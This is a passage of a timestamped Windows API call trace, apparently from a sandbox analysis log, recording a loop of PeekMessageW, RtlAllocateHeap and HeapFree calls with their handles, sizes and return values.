(in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.437] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.437] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.437] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b20 | out: hHeap=0xbc0000) returned 1 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b20 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.438] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b68 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.438] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.438] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.438] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b20 | out: hHeap=0xbc0000) returned 1 [0257.438] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.438] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d5e0 [0257.438] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b20 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.438] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6d8 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.438] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.438] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018d8 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b18 [0257.438] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.438] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.438] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b20 | out: hHeap=0xbc0000) returned 1 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6d8 | out: hHeap=0xbc0000) returned 1 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b80 | out: hHeap=0xbc0000) returned 1 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.439] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.439] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b68 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.439] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.439] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.439] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.439] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.439] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.439] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.439] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.439] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.439] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.439] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.439] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b48 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.439] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.439] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.439] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.440] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b38 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018d8 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0257.440] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.440] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.440] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.440] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b28 [0257.440] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.440] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.440] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.440] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.440] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.440] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.440] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.440] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.440] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.440] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.440] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.440] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.440] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.441] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.441] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.441] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.441] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.441] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.441] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.441] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.441] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.441] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.441] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.441] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.441] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.441] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.441] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.441] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.441] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.441] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.441] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.441] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.441] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.441] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.441] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.441] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.441] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.441] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.441] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.441] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.441] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.441] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.441] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.441] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.441] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.441] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.442] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.442] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.442] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.442] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.442] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.442] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.442] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.442] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.442] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.442] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.442] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.442] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.442] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.442] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.442] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.442] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.442] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.442] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.442] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.442] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.442] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.442] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.442] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.442] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.442] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.442] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.442] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.442] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.442] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.442] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.442] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.442] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.442] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.443] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.443] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.443] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.443] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.443] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.444] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.444] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.444] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.444] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.444] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.444] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.444] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.444] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.444] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.444] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.444] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.444] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.444] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.444] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.444] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.444] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, 